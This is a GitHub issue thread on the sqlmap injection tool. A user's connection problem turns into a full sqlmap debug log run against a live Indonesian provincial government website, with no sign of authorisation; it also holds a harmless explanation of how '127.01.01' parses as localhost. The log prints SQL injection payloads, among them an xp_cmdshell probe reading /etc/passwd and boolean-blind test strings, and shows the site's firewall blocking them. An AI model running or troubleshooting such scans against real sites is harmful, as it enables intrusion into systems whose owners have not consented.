sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

unable to connect to the target URL. sqlmap is going to retry the request #5451

Closed y0ur3nz closed 1 year ago

y0ur3nz commented 1 year ago

$ ./sqlmap.py -u https://127.01.01:443/tabel/stat2.php --data="tanggal=04&tahun=2020" -t traffic.txt --random-agent -v 6 --flush-session --level=3 --risk=2

[14:23:07] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[14:23:07] [TRAFFIC OUT] HTTP request [#260]:
POST /tabel/stat2.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.16) Gecko/20101130 MRA 5.4 (build 02647) Firefox/3.5.16 (.NET CLR 3.5.30729; .NET4.0C)
Referer: https://127.01.01/tabel/stat2.php
Host: 127.01.01
Accept: */*
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 57
Connection: close

stamparm commented 1 year ago

sqlmap is able to recognize 127.01.01 properly as localhost. Just tested. You have a problem in your HTTPS server at localhost.
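Why `127.01.01` counts as localhost, as an added example (not sqlmap's code and not posted by anyone in this thread): a Python parser that follows the classic `inet_aton()` rules for short and octal/hex IPv4 forms, next to the strict `ipaddress` parser, which rejects the same string. The function names are hypothetical and the sample hosts other than `127.01.01` are constructed.

```python
import ipaddress

def _parse_part(part):
    """One dotted component, C-style: 0x.. is hex, a leading 0 is octal."""
    lowered = part.lower()
    if lowered.startswith("0x"):
        digits, base = lowered[2:], 16
    elif lowered.startswith("0") and len(lowered) > 1:
        digits, base = lowered[1:], 8
    else:
        digits, base = lowered, 10
    allowed = "0123456789abcdef"[:base]
    if not digits or any(ch not in allowed for ch in digits):
        raise ValueError(f"bad IPv4 component: {part!r}")
    return int(digits, base)

def parse_legacy_ipv4(text):
    """Parse a.b.c.d, a.b.c, a.b or a the way inet_aton() does."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"not an IPv4 literal: {text!r}")
    *head, tail = [_parse_part(p) for p in parts]
    tail_bytes = 4 - len(head)  # the last component fills all remaining bytes
    if any(v > 0xFF for v in head) or tail >= 1 << (8 * tail_bytes):
        raise ValueError(f"IPv4 component out of range: {text!r}")
    return ipaddress.IPv4Address(bytes(head) + tail.to_bytes(tail_bytes, "big"))

def is_loopback_host(host):
    """True if host is an IPv4 literal (strict or legacy form) in 127.0.0.0/8."""
    try:
        return parse_legacy_ipv4(host).is_loopback
    except ValueError:
        return False  # a DNS name or malformed literal; resolve it before judging

def strict_parser_accepts(host):
    """True if Python's strict dotted-quad parser takes the string as-is."""
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # Constructed sample hosts, plus the literal from the issue.
    for host in ("127.01.01", "127.1", "0x7f000001", "192.168.1.10", "localhost"):
        print(host, is_loopback_host(host), strict_parser_accepts(host))
```

The three-part form puts `01` into the last two bytes, so `127.01.01` is `127.1.0.1`, inside the loopback block; a host check built only on the strict parser would treat the same string as a name rather than an address.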

y0ur3nz commented 1 year ago

./sqlmap.py -u https://corona.jambiprov.go.id/v2/berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas* -t traffic.txt --random-agent -v 3 --flush-session --level=3 --risk=2


[sqlmap ASCII banner: {1.7.6.3#dev}, https://sqlmap.org]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:52:32 /2023-07-04/

[20:52:32] [DEBUG] cleaning up configuration parameters
[20:52:33] [INFO] setting file for logging HTTP traffic
[20:52:33] [DEBUG] setting the HTTP timeout
[20:52:33] [DEBUG] setting the HTTP User-Agent header
[20:52:33] [DEBUG] loading random HTTP User-Agent header(s) from file '/data/data/com.termux/files/home/sqlmap-dev/data/txt/user-agents.txt'
[20:52:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11' from file '/data/data/com.termux/files/home/sqlmap-dev/data/txt/user-agents.txt'
[20:52:33] [DEBUG] creating HTTP requests opener object
[20:52:36] [DEBUG] setting the HTTP Referer header to the target URL
custom injection marker ('*') found in option '-u'. Do you want to procy
[20:53:15] [INFO] flushing session file
[20:53:15] [DEBUG] resolving hostname 'corona.jambiprov.go.id'
[20:53:15] [INFO] testing connection to the target URL
[20:53:16] [DEBUG] declared web page charset 'utf-8'
[20:53:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:53:17] [PAYLOAD] 5773 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/*/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[20:53:17] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:17] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/y
[20:53:22] [WARNING] please consider usage of tamper scripts (option '--tamper')
[20:53:22] [INFO] testing if the target URL content is stable
[20:53:23] [INFO] target URL content is stable
other non-custom parameters found. Do you want to process them too? [Y/
[20:53:25] [INFO] testing if URI parameter '#1' is dynamic
[20:53:25] [PAYLOAD] 5813
[20:53:28] [DEBUG] page not found (404)
[20:53:29] [WARNING] URI parameter '#1' does not appear to be dynamic
[20:53:29] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas(",)')(,.(
[20:53:30] [INFO] heuristic (basic) test shows that URI parameter '#1' might be injectable (possible DBMS: 'MySQL')
[20:53:30] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas'EiCPGq<'">CsHnox
[20:53:31] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' ey
[20:53:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 1179=6981-- tfcc
[20:53:37] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 5682=5682-- WxfQ
[20:53:37] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas' AND 1015=4800-- GRmf
[20:53:37] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas' AND 5682=5682-- vpfV
[20:53:38] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:38] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 8607=4778 AND (2826=2826
[20:53:38] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:38] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 5682=5682 AND (2533=2533
[20:53:38] [DEBUG] got HTTP error code: 403 ('Forbidden')
[20:53:38] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas)) AND 1081=6711 AND ((5767=5767
[20:53:38] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:53:39] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[20:53:39] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[20:53:40] [CRITICAL] unable to connect to the target URL
[20:53:40] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas)) AND 5682=5682 AND ((6215=6215
[20:53:40] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:53:40] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[20:53:40] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[20:53:41] [CRITICAL] unable to connect to the target URL
[20:53:41] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas))) AND 5186=9805 AND (((9225=9225
[20:53:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:53:41] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[20:53:42] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
[20:53:42] [CRITICAL] unable to connect to the target URL
[20:53:42] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas))) AND 5682=5682 AND (((1497=1497
[20:53:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:53:43] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request
there seems to be a continuous problem with connection to the target. A
[20:53:43] [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 7 times, 404 (Not Found) - 1 times
[20:53:43] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

[*] ending @ 20:53:43 /2023-07-04/